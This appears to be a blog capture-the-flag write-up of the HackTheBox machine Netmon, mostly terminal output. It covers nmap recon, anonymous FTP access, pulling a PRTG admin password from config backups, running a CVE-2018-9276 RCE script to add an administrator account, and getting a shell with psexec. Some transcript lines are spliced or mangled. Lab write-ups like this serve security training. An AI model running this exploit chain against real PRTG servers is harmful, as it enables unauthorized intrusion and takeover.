Hacking Netmon, In HackTheBox.

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ nmap -sC -sV -p0-1000 10.10.10.152 > results.txt &
[1] 1373

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ 1 ⚙
[1] + done nmap -sC -sV -p0-1000 10.10.10.152 > results.txt
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–01–03 00:57 EST
Nmap scan report for 10.10.10.152
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02–02–19 11:18PM 1024 .rnd
| 02–25–19 09:15PM <DIR> inetpub
| 07–16–16 08:18AM <DIR> PerfLogs
| 02–25–19 09:56PM <DIR> Program Files
| 02–02–19 11:28PM <DIR> Program Files (x86)
| 02–03–19 07:08AM <DIR> Users
|_02–25–19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2–2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2–2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 37s, deviation: 0s, median: 36s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–01–03T05:58:08
|_ start_date: 2021–01–02T19:14:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ ftp -p 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ ftp -p 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,126)
125 Data connection already open; Transfer starting.
02–02–19 11:18PM 1024 .rnd
02–25–19 09:15PM <DIR> inetpub
07–16–16 08:18AM <DIR> PerfLogs
02–25–19 09:56PM <DIR> Program Files
02–02–19 11:28PM <DIR> Program Files (x86)
02–03–19 07:08AM <DIR> Users
02–25–19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
227 Entering Passive Mode (10,10,10,152,230,127)
125 Data connection already open; Transfer starting.
02–25–19 10:44PM <DIR> Administrator
02–02–19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,128)
125 Data connection already open; Transfer starting.
02–03–19 07:05AM <DIR> Documents
07–16–16 08:18AM <DIR> Downloads
07–16–16 08:18AM <DIR> Music
07–16–16 08:18AM <DIR> Pictures
02–02–19 11:35PM 33 user.txt
07–16–16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
227 Entering Passive Mode (10,10,10,152,230,129)
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.21 secs (0.1569 kB/s)
ftp> 221 Goodbye.

┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat user.txt
C:\Users\All Users\Application Data
ftp> cd All\ Users
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,205)
150 Opening ASCII mode data connection.
02–02–19 11:15PM <DIR> Licenses
11–20–16 09:36PM <DIR> Microsoft
02–02–19 11:18PM <DIR> Paessler
02–03–19 07:05AM <DIR> regid.1991–06.com.microsoft
07–16–16 08:18AM <DIR> SoftwareDistribution
02–02–19 11:15PM <DIR> TEMP
11–20–16 09:19PM <DIR> USOPrivate
11–20–16 09:19PM <DIR> USOShared
02–25–19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,206)
125 Data connection already open; Transfer starting.
01–03–21 01:26AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Netowrk\ Monitor
550 The system cannot find the file specified.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,216)
125 Data connection already open; Transfer starting.
01–02–21 02:56PM <DIR> Configuration Auto-Backups
01–02–21 07:00PM <DIR> Log Database
02–02–19 11:18PM <DIR> Logs (Debug)
02–02–19 11:18PM <DIR> Logs (Sensors)
02–02–19 11:18PM <DIR> Logs (System)
01–03–21 12:00AM <DIR> Logs (Web Server)
01–02–21 07:01PM <DIR> Monitoring Database
02–25–19 09:54PM 1189697 PRTG Configuration.dat
02–25–19 09:54PM 1189697 PRTG Configuration.old
07–14–18 02:13AM 1153755 PRTG Configuration.old.bak
01–03–21 01:26AM 1724708 PRTG Graph Data Cache.dat
02–25–19 10:00PM <DIR> Report PDFs
02–02–19 11:18PM <DIR> System Information Database
02–02–19 11:40PM <DIR> Ticket Database
02–02–19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp>
cat * | grep -A 5 -B 5 prtgadmin<dbpassword>
<! — User: prtgadmin →
PrTg@dmin2018
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ ./prtg-exploit.sh -u http://10.10.10.152 -c “ _ga=GA1.4.1222464343.1609254788; _gid=GA1.4.1624489487.1609656414; OCTOPUS1813713946=ezJFRkI5MEY0LTJBRTItNEVGQy1BREEzLTEyMzQyMDY5OEEwOH0%3D; _gat=1” 130 ⨯
[+]#########################################################################[+]
[*] PRTG RCE script by M4LV0 [*]
[+]#########################################################################[+]
[*] https://github.com/M4LV0 [*]
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution CVE-2018–9276 [*]
[+]#########################################################################[+]
# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user ‘pentest’ in the administrators group with password ‘P3nT3st!’
[+]#########################################################################[+][*] file created
[*] sending notification wait….
[*] adding a new user ‘pentest’ with password ‘P3nT3st’
[*] sending notification wait….
[*] adding a user pentest to the administrators group
[*] sending notification wait….
[*] exploit completed new user ‘pentest’ with password ‘P3nT3st!’ created have fun!

┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$
┌──(root💀kali)-[/home/kali]
└─# find / -name psexec.py
/usr/share/doc/python3-impacket/examples/psexec.py
/usr/share/set/src/fasttrack/psexec.py
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:’P3nT3st!’@10.10.10.152
Impacket v0.9.21 — Copyright 2020 SecureAuth Corporation[*] Requesting shares on 10.10.10.152…..
[*] Found writable share ADMIN$
[*] Uploading file oIhajMMZ.exe
[*] Opening SVCManager on 10.10.10.152…..
[*] Creating service MCRJ on 10.10.10.152…..
[*] Starting service MCRJ…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
© 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd ../..

C:\>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\02/02/2019 11:18 PM 1,024 .rnd
02/25/2019 09:15 PM <DIR> inetpub
07/16/2016 08:18 AM <DIR> PerfLogs
02/25/2019 09:56 PM <DIR> Program Files
02/02/2019 11:28 PM <DIR> Program Files (x86)
02/03/2019 07:08 AM <DIR> Users
01/03/2021 02:00 AM <DIR> Windows
1 File(s) 1,024 bytes
6 Dir(s) 12,056,117,248 bytes free
C:\>
C:\>cd Users

C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users02/03/2019 07:08 AM <DIR> .
02/03/2019 07:08 AM <DIR> ..
02/25/2019 10:44 PM <DIR> Administrator
01/03/2021 01:50 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 12,055,908,352 bytes free
C:\Users>cd Administrator

C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator02/25/2019 10:58 PM <DIR> .
02/25/2019 10:58 PM <DIR> ..
02/03/2019 07:08 AM <DIR> Contacts
02/02/2019 11:35 PM <DIR> Desktop
02/03/2019 07:08 AM <DIR> Documents
02/03/2019 07:08 AM <DIR> Downloads
02/03/2019 07:08 AM <DIR> Favorites
02/03/2019 07:08 AM <DIR> Links
02/03/2019 07:08 AM <DIR> Music
02/03/2019 07:08 AM <DIR> Pictures
02/03/2019 07:08 AM <DIR> Saved Games
02/03/2019 07:08 AM <DIR> Searches
02/25/2019 10:06 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 12,055,908,352 bytes free
C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8
Directory of C:\Users\Administrator\Desktop02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 12,055,908,352 bytes free
C:\Users\Administrator\Desktop>type root.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store